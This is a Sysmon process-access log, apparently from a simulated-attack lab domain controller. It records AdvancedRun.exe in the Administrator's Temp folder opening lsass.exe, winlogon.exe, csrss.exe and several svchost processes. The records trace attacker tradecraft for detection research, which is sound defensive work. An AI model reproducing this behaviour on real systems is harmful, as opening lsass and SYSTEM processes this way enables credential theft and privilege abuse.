20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004067426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.646{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.645{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
